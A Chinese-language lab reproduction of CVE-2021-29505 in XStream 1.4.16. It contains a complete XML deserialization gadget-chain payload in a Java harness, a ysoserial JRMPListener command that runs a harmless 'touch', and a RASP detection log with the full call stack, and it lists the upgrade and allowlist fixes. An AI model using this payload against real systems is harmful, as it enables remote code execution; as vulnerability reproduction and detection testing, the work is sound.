# CVE-2021-29505

# 漏洞环境

maven 依赖

<dependency>                                     
    <groupId>com.thoughtworks.xstream</groupId>  
    <artifactId>xstream</artifactId>             
    <version>1.4.16</version>                    
</dependency>                                    
<dependency>                                     
    <groupId>org.apache.commons</groupId>        
    <artifactId>commons-collections4</artifactId>
    <version>4.0</version>                       
</dependency>                                    

代码

/**
 * Reproduction harness for CVE-2021-29505 against XStream 1.4.16 (the version pinned in
 * the pom snippet above).
 *
 * <p>{@code main} feeds a hand-written XML document to an XStream instance that has no
 * type allowlist configured. The document describes a {@code java.util.PriorityQueue}
 * with {@code serialization='custom'} holding two {@code javax.naming.ldap.Rdn$RdnEntry}
 * elements; the second wraps a {@code Packet} / SAAJ / mimepull object graph that ends
 * in an RMI registry stub for 127.0.0.1:1096 — the same endpoint as the listener started
 * in step 1 of the reproduction section.
 *
 * <p>The weakness is not in this class but in how the XStream instance is built: with no
 * allowlist, unmarshalling instantiates whatever classes the XML names and runs their
 * {@code readObject} / {@code compareTo} / {@code toString} logic. According to the RASP
 * log in this write-up, that path goes through {@code PriorityQueue.heapify},
 * {@code RegistryContext.lookup}, a remote {@code ObjectInputStream.readObject}, and
 * finally {@code Runtime.exec}.
 *
 * <p>Defensive takeaways (deliberately not applied here, since this is a lab reproduction):
 * <ul>
 *   <li>upgrade to XStream 1.4.17 or later, which contains the vendor fix for this CVE;</li>
 *   <li>register an explicit allowlist through XStream's security framework
 *       ({@code allowTypes} / {@code allowTypesByWildcard}) so the JNDI and RMI types
 *       named in this payload are rejected before any converter runs;</li>
 *   <li>do not set {@code com.sun.jndi.rmi.object.trustURLCodebase} to {@code true}
 *       outside of a throwaway lab.</li>
 * </ul>
 */
public class CVE_2021_29505 {

    /**
     * Builds the payload XML, loosens the JDK's RMI codebase restriction, and unmarshals
     * the payload with a default-configured XStream.
     *
     * @param args ignored
     */
    public static void main(String[] args) {
        // The payload is a PriorityQueue in XStream's "custom serialization" form. The
        // entries are Rdn$RdnEntry objects whose values are compared during
        // PriorityQueue.readObject -> heapify; the <registry> element carries the RMI
        // endpoint (host/port) that the chain dereferences, matching the local listener
        // from the reproduction steps.
        String pocXml = "<java.util.PriorityQueue serialization='custom'>\n" +
                "    <unserializable-parents/>\n" +
                "    <java.util.PriorityQueue>\n" +
                "        <default>\n" +
                "            <size>2</size>\n" +
                "        </default>\n" +
                "        <int>3</int>\n" +
                "        <javax.naming.ldap.Rdn_-RdnEntry>\n" +
                "            <type>12345</type>\n" +
                "            <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n" +
                "                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: &lt;none&gt;</m__obj>\n" +
                "            </value>\n" +
                "        </javax.naming.ldap.Rdn_-RdnEntry>\n" +
                "        <javax.naming.ldap.Rdn_-RdnEntry>\n" +
                "            <type>12345</type>\n" +
                "            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>\n" +
                "                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\n" +
                "                    <parsedMessage>true</parsedMessage>\n" +
                "                    <soapVersion>SOAP_11</soapVersion>\n" +
                "                    <bodyParts/>\n" +
                "                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\n" +
                "                        <attachmentsInitialized>false</attachmentsInitialized>\n" +
                "                        <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>\n" +
                "                            <soapPart/>\n" +
                "                            <mm>\n" +
                "                                <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\n" +
                "                                    <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>\n" +
                "                                        <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>\n" +
                "                                            <names>\n" +
                "                                                <string>aa</string>\n" +
                "                                                <string>aa</string>\n" +
                "                                            </names>\n" +
                "                                            <ctx>\n" +
                "                                                <environment/>\n" +
                "                                                <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>\n" +
                "                                                    <java.rmi.server.RemoteObject>\n" +
                "                                                        <string>UnicastRef</string>\n" +
                "                                                        <string>127.0.0.1</string>\n" +
                "                                                        <int>1096</int>\n" +
                "                                                        <long>0</long>\n" +
                "                                                        <int>0</int>\n" +
                "                                                        <long>0</long>\n" +
                "                                                        <short>0</short>\n" +
                "                                                        <boolean>false</boolean>\n" +
                "                                                    </java.rmi.server.RemoteObject>\n" +
                "                                                </registry>\n" +
                "                                                <host>127.0.0.1</host>\n" +
                "                                                <port>1096</port>\n" +
                "                                            </ctx>\n" +
                "                                        </candidates>\n" +
                "                                    </aliases>\n" +
                "                                </it>\n" +
                "                            </mm>\n" +
                "                        </multiPart>\n" +
                "                    </sm>\n" +
                "                </message>\n" +
                "            </value>\n" +
                "        </javax.naming.ldap.Rdn_-RdnEntry>\n" +
                "    </java.util.PriorityQueue>\n" +
                "</java.util.PriorityQueue>";
        // Lab-only: the JDK ships this flag as false; flipping it to true removes a
        // built-in hardening of RMI/JNDI reference handling. Do not do this in production.
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        // Default constructor, no allowTypes()/security-framework configuration, so the
        // classes named in the XML above are accepted by the unmarshaller.
        XStream xStream = new XStream();
        // Unmarshalling is what drives the chain; see the "stackTrace" array in the RASP
        // log further down this page for the exact frames observed.
        xStream.fromXML(pocXml);
    }
}

POC 工具下载

wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

# 漏洞复现

1.启动 RMI 服务

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1096 CommonsCollections4 'touch /tmp/cve.txt'

2.java 服务配置 rasp-agent

-javaagent:/Users/xxxx/Desktop/rasp/rasp-module/sandbox/lib/sandbox-agent.jar

3.启动 java 服务

4.查看 rasp 检测到的攻击日志

{
    "cmdarray":[
        "touch",
        "/tmp/cve.txt"
    ],
    "stackTrace":[
        "java.lang.ProcessImpl.start(ProcessImpl.java)",
        "java.lang.ProcessBuilder.start(ProcessBuilder.java:1029)",
        "java.lang.Runtime.exec(Runtime.java:620)",
        "java.lang.Runtime.exec(Runtime.java:450)",
        "java.lang.Runtime.exec(Runtime.java:347)",
        "ysoserial.Pwner223862586630727.<clinit>(Gadgets.java)",
        "sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)",
        "sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)",
        "sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)",
        "java.lang.reflect.Constructor.newInstance(Constructor.java:423)",
        "java.lang.Class.newInstance(Class.java:442)",
        "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.getTransletInstance(TemplatesImpl.java:455)",
        "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.newTransformer(TemplatesImpl.java:486)",
        "com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter.<init>(TrAXFilter.java:58)",
        "sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)",
        "sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)",
        "sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)",
        "java.lang.reflect.Constructor.newInstance(Constructor.java:423)",
        "org.apache.commons.collections4.functors.InstantiateTransformer.transform(InstantiateTransformer.java:116)",
        "org.apache.commons.collections4.functors.InstantiateTransformer.transform(InstantiateTransformer.java:32)",
        "org.apache.commons.collections4.functors.ChainedTransformer.transform(ChainedTransformer.java:112)",
        "org.apache.commons.collections4.comparators.TransformingComparator.compare(TransformingComparator.java:81)",
        "java.util.PriorityQueue.siftDownUsingComparator(PriorityQueue.java:722)",
        "java.util.PriorityQueue.siftDown(PriorityQueue.java:688)",
        "java.util.PriorityQueue.heapify(PriorityQueue.java:737)",
        "java.util.PriorityQueue.readObject(PriorityQueue.java:797)",
        "sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)",
        "sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)",
        "sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)",
        "java.lang.reflect.Method.invoke(Method.java:498)",
        "java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1158)",
        "java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2176)",
        "java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2067)",
        "java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1571)",
        "java.io.ObjectInputStream.access$800(ObjectInputStream.java:214)",
        "java.io.ObjectInputStream$GetFieldImpl.readFields(ObjectInputStream.java:2450)",
        "java.io.ObjectInputStream.readFields(ObjectInputStream.java:601)",
        "javax.management.BadAttributeValueExpException.readObject(BadAttributeValueExpException.java:71)",
        "sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)",
        "sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)",
        "sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)",
        "java.lang.reflect.Method.invoke(Method.java:498)",
        "java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1158)",
        "java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2176)",
        "java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2067)",
        "java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1571)",
        "java.io.ObjectInputStream.readObject(ObjectInputStream.java:431)",
        "sun.rmi.transport.StreamRemoteCall.executeCall(StreamRemoteCall.java:252)",
        "sun.rmi.server.UnicastRef.invoke(UnicastRef.java:375)",
        "sun.rmi.registry.RegistryImpl_Stub.lookup(RegistryImpl_Stub.java:119)",
        "com.sun.jndi.rmi.registry.RegistryContext.lookup(RegistryContext.java:132)",
        "com.sun.jndi.rmi.registry.BindingEnumeration.next(RegistryContext.java:617)",
        "com.sun.jndi.rmi.registry.BindingEnumeration.next(RegistryContext.java:585)",
        "com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl.findNextMatch(LazySearchEnumerationImpl.java:145)",
        "com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl.hasMore(LazySearchEnumerationImpl.java:101)",
        "com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl.hasMoreElements(LazySearchEnumerationImpl.java:106)",
        "com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator.findNextCert(KeyStoreResolver.java:136)",
        "com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator.hasNext(KeyStoreResolver.java:104)",
        "com.sun.xml.internal.org.jvnet.mimepull.MIMEMessage.makeProgress(MIMEMessage.java:180)",
        "com.sun.xml.internal.org.jvnet.mimepull.MIMEMessage.parseAll(MIMEMessage.java:167)",
        "com.sun.xml.internal.org.jvnet.mimepull.MIMEMessage.getAttachments(MIMEMessage.java:92)",
        "com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart.parseAll(MimePullMultipart.java:107)",
        "com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart.parse(MimePullMultipart.java:118)",
        "com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimeMultipart.getCount(MimeMultipart.java:195)",
        "com.sun.xml.internal.messaging.saaj.soap.MessageImpl.initializeAllAttachments(MessageImpl.java:1379)",
        "com.sun.xml.internal.messaging.saaj.soap.MessageImpl.getAttachments(MessageImpl.java:819)",
        "com.sun.xml.internal.ws.message.saaj.SAAJMessage$SAAJAttachmentSet.<init>(SAAJMessage.java:650)",
        "com.sun.xml.internal.ws.message.saaj.SAAJMessage.getAttachments(SAAJMessage.java:178)",
        "com.sun.xml.internal.ws.message.saaj.SAAJMessage.copy(SAAJMessage.java:506)",
        "com.sun.xml.internal.ws.api.message.MessageWrapper.copy(MessageWrapper.java:217)",
        "com.sun.xml.internal.ws.api.message.Packet.toString(Packet.java:1093)",
        "com.sun.org.apache.xpath.internal.objects.XString.equals(XString.java:392)",
        "javax.naming.ldap.Rdn$RdnEntry.compareTo(Rdn.java:441)",
        "javax.naming.ldap.Rdn$RdnEntry.compareTo(Rdn.java:420)",
        "java.util.PriorityQueue.siftDownComparable(PriorityQueue.java:704)",
        "java.util.PriorityQueue.siftDown(PriorityQueue.java:690)",
        "java.util.PriorityQueue.heapify(PriorityQueue.java:737)",
        "java.util.PriorityQueue.readObject(PriorityQueue.java:797)",
        "sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)",
        "sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)",
        "sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)",
        "java.lang.reflect.Method.invoke(Method.java:498)",
        "com.thoughtworks.xstream.core.util.SerializationMembers.callReadObject(SerializationMembers.java:132)",
        "com.thoughtworks.xstream.converters.reflection.SerializableConverter.doUnmarshal(SerializableConverter.java:443)",
        "com.thoughtworks.xstream.converters.reflection.AbstractReflectionConverter.unmarshal(AbstractReflectionConverter.java:277)",
        "com.thoughtworks.xstream.core.TreeUnmarshaller.convert(TreeUnmarshaller.java:72)",
        "com.thoughtworks.xstream.core.AbstractReferenceUnmarshaller.convert(AbstractReferenceUnmarshaller.java:72)",
        "com.thoughtworks.xstream.core.TreeUnmarshaller.convertAnother(TreeUnmarshaller.java:66)",
        "com.thoughtworks.xstream.core.TreeUnmarshaller.convertAnother(TreeUnmarshaller.java:50)",
        "com.thoughtworks.xstream.core.TreeUnmarshaller.start(TreeUnmarshaller.java:134)",
        "com.thoughtworks.xstream.core.AbstractTreeMarshallingStrategy.unmarshal(AbstractTreeMarshallingStrategy.java:32)",
        "com.thoughtworks.xstream.XStream.unmarshal(XStream.java:1429)",
        "com.thoughtworks.xstream.XStream.unmarshal(XStream.java:1409)",
        "com.thoughtworks.xstream.XStream.fromXML(XStream.java:1294)",
        "com.thoughtworks.xstream.XStream.fromXML(XStream.java:1285)",
        "com.CVE_2021_29505.main(CVE_2021_29505.java:70)"
    ]
}

上面的攻击日志分为两部分：第一部分是执行的命令，第二部分是攻击调用栈；如果是 HTTP 请求，还会记录完整的 HTTP 报文。